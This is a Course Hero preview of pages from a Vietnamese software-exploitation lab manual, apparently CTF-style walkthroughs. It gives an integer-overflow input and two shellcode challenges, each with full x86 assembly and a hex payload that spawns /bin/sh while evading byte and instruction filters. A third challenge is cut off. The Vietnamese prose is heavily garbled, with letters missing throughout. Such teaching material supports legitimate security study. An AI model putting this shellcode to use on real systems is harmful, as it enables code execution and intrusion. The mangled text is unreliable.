Hướng dẫn thực hành khai thác lỗ hổng phần mềm.docx

Khi b c t ch còn 4 byte th p thì s ch còn

This preview shows page 65 - 72 out of 76 pages.

khi b c t ch còn 4 byte th p thì s ch còn 0x7fffffff = 2147483647 > 99999 B c 3: T o mã khai thác: ướ 65
Image of page 65

Subscribe to view the full document.

Input vào ch ng trình 18446744071562067967 ươ 66
Image of page 66
26. Shellcode-1 M c tiêu : Gi i thi u các k thu t vi t shellcode. ế Mô t : Ch ng trình cho phép nh p vào shellcode sau đó th c thi ươ shellcode. Tuy nhiên c m m t s k t đòi h i ng i ch i ph i có ki n ỹ ự ườ ơ ế th c vi t code asm đ v t qua. ế ượ Các b c th c hi n ướ : B c 1: Phân tích đ bài. ướ Th c thi file shellcode-1 ta thu đ c: ượ Hình 2.46 Th c thi shellcode-1 Shellcode không cho phép kí t 0B cũng chính là giá tr c n đ a vào eax ư đ th c hi n l nh ng t execv (th c thi) B c 2: L p k ch b n khai thác: ướ Đ th c thi đ c /bin/sh shellcode c n đ a CPU v tr ng thái nh sau: ượ ư ư EAX = 0xb, EBX = [đ a ch ch a chu i /bin/sh], ECX = EDX = 0; Sau đó là th c thi câu l nh int 0x80. Đ v n th c hi n l nh ng t th c thi v t qua vi c c m này ta có th ượ s d ng các câu l nh nh ADD, XOR, SUB. Ví d ư xor eax, eax add eax, 0x1 add eax, 0xa 67
Image of page 67

Subscribe to view the full document.

B c 3: T o mã khai thác: ướ 0: 31 c9 xor ecx,ecx 2: f7 e1 mul ecx 4: 51 push ecx 5: 68 2f 2f 73 68 push 0x68732f2f a: 68 2f 62 69 6e push 0x6e69622f f: 89 e3 mov ebx,esp 11: 04 0a add al,0xa 13: fe c0 inc al 15: cd 80 int 0x80 INPUT vào ch ng trình ươ 31C9F7E151682F2F7368682F62696E89E3040AFEC0CD80 27. Shellcode-2 M c tiêu : Gi i thi u các k thu t vi t shellcode. ế Mô t : Ch ng trình cho phép nh p vào shellcode sau đó th c thi ươ shellcode. Tuy nhiên c m m t s k t đòi h i ng i ch i ph i có ki n ỹ ự ườ ơ ế th c vi t code asm đ v t qua. ế ượ Các b c th c hi n ướ : B c 1: Phân tích đ bài: ướ Th c thi file shellcode-2 ta thu đ c: ượ Hình 2.47 Th c thi shellcode-2 So v i bài tr c bài này c m thêm l nh mov “mov ebx, esp” ướ 68
Image of page 68
B c 2: L p k ch b n khai thác: ướ mov ebx, esp là l nh c n có đ có th cho giá tr ebx tr đ n chu i ế “/bin/sh”. Ta có th v t qua c ch này b ng cách đ y esp vào stack ượ ơ ế r i l y đ nh stack ra đ a vào rbx. Ví d : ư push rsp pop rbx B c 3: T o mã khai thác: ướ 0: 31 c9 xor ecx,ecx 2: f7 e1 mul ecx 4: 51 push ecx 5: 68 2f 2f 73 68 push 0x68732f2f a: 68 2f 62 69 6e push 0x6e69622f f: 54 push esp 10: 5b pop ebx 11: 04 0a add al,0xa 13: fe c0 inc al 15: cd 80 int 0x80 Input vào ch ng trình ươ 31C9F7E151682F2F7368682F62696E545B040AFEC0CD80 28. Shellcode-3 M c tiêu : Gi i thi u các k thu t vi t shellcode. ế Mô t : Ch ng trình cho phép nh p vào shellcode sau đó th c thi ươ shellcode. Tuy nhiên c m m t s k t đòi h i ng i ch i ph i có ki n ỹ ự ườ ơ ế th c vi t code asm đ v t qua. ế ượ Các b c th c hi n ướ : B c 1: Phân tích đ bài: ướ 69
Image of page 69

Subscribe to view the full document.

Th c thi file shellcode-3 ta thu đ c: ượ 70
Image of page 70
Hình 2.48 Th
Image of page 71

Subscribe to view the full document.

Image of page 72
  • Fall '19

{[ snackBarMessage ]}

What students are saying

  • Left Quote Icon

    As a current student on this bumpy collegiate pathway, I stumbled upon Course Hero, where I can find study resources for nearly all my courses, get online help from tutors 24/7, and even share my old projects, papers, and lecture notes with other students.

    Student Picture

    Kiran Temple University Fox School of Business ‘17, Course Hero Intern

  • Left Quote Icon

    I cannot even describe how much Course Hero helped me this summer. It’s truly become something I can always rely on and help me. In the end, I was not only able to survive summer classes, but I was able to thrive thanks to Course Hero.

    Student Picture

    Dana University of Pennsylvania ‘17, Course Hero Intern

  • Left Quote Icon

    The ability to access any university’s resources through Course Hero proved invaluable in my case. I was behind on Tulane coursework and actually used UCLA’s materials to help me move forward and get everything together on time.

    Student Picture

    Jill Tulane University ‘16, Course Hero Intern